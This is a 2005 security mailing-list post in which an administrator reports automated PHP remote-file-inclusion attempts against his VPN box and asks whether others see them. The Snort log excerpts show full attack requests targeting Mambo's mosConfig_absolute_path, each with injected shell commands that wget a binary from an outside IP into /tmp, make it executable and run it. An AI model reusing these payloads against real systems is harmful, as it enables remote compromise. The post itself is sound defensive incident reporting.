[Dshield] PHP injection attacks

tfischer@oldenburggroup.com tfischer at oldenburggroup.com
Thu Dec 22 03:25:35 GMT 2005


   I have started to see exploit attempts against my VPN. I believe I have
identified them as:
 FrSIRT advisory 12/15/05 - ADV-2005-2932  CVE-2005-4317 CVE-2005-4318
CVE-2005-4319 CVE-2005-4320
   I called my VPN vendor to see if they were susceptible to this type of
attack. They said that as long as I had the latest patches I should be fine.
I asked them why the device does not log the attempts. They said they didn't
know, but there was no need to worry as long as the patches were in. The
attacks are only being directed at this box. They come in sets of 5 or 6.
There was one set Monday night, 6 yesterday and 50 so far today. Does anyone
know if this pattern has been automated and I'm just seeing some bots out
there searching? Anyone else seeing this?
   Here are some of the SNORT logs:

GET
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_c
ontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.
111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;
./listen;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&m
osConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%2021
6.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mos
Config_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.
15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET
/cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBAL
S=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%
20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_
content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.13
0.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./
sexy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_c
ontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130
.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./s
exy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&m
osConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066
.235.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%2
0YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mos
Config_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.2
35.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20Y
YY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)





More information about the list mailing list